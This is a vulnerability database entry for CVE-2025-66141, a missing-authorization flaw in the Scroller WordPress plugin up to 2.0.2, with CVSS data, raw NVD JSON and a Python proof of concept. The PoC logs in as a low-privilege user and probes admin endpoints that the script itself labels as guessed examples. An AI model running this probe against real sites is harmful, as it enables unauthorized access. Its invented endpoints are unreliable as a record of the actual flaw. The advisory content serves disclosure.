Security Vulnerability Report
中文
CVE-2025-66141 CVSS 5.4 MEDIUM

CVE-2025-66141

Published: 2026-01-22 17:16:01
Last Modified: 2026-04-27 17:16:42

Description

Missing Authorization vulnerability in merkulove Scroller scroller allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Scroller: from n/a through <= 2.0.2.

CVSS Details

CVSS Score
5.4
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N

Configurations (Affected Products)

No configuration data available.

merkulove Scroller <= 2.0.2

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-66141 PoC - WordPress Scroller Plugin Authorization Bypass # Target: merkulove Scroller Plugin <= 2.0.2 import requests from urllib.parse import urljoin target_url = "http://target-wordpress-site.com" username = "attacker" password = "attacker_password" # Login to WordPress session = requests.Session() login_url = urljoin(target_url, "/wp-login.php") login_data = { "log": username, "pwd": password, "wp-submit": "Log In", "redirect_to": "/wp-admin/", "testcookie": "1" } response = session.post(login_url, data=login_data) # Check if login was successful if "wordpress_logged_in" in str(session.cookies): print("[+] Login successful") # Try to access admin-only functionality (example endpoint) # Replace 'scroller_admin_endpoint' with actual vulnerable endpoint admin_endpoints = [ "/wp-admin/admin-ajax.php?action=scroller_save_config", "/wp-admin/admin-ajax.php?action=scroller_get_data", "/wp-admin/admin.php?page=scroller_settings" ] for endpoint in admin_endpoints: vuln_url = urljoin(target_url, endpoint) response = session.get(vuln_url) # Check if unauthorized access was successful if response.status_code == 200 and "error" not in response.text.lower(): print(f"[+] Potential vulnerability: {vuln_url}") print(f" Response: {response.text[:200]}") else: print("[-] Login failed") print("\n[*] Note: This PoC demonstrates authorization bypass testing.") print("[*] Actual exploitation requires identifying specific vulnerable endpoints.")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-66141", "sourceIdentifier": "[email protected]", "published": "2026-01-22T17:16:01.077", "lastModified": "2026-04-27T17:16:41.543", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Missing Authorization vulnerability in merkulove Scroller scroller allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Scroller: from n/a through <= 2.0.2."}, {"lang": "es", "value": "Vulnerabilidad de autorización faltante en merkulove Scroller scroller permite la explotación de niveles de seguridad de control de acceso configurados incorrectamente. Este problema afecta a Scroller: desde n/a hasta &lt;= 2.0.2."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N", "baseScore": 5.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.5}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/scroller/vulnerability/wordpress-scroller-plugin-2-0-2-broken-access-control-vulnerability?_s_id=cve", "source": "[email protected]"}]}}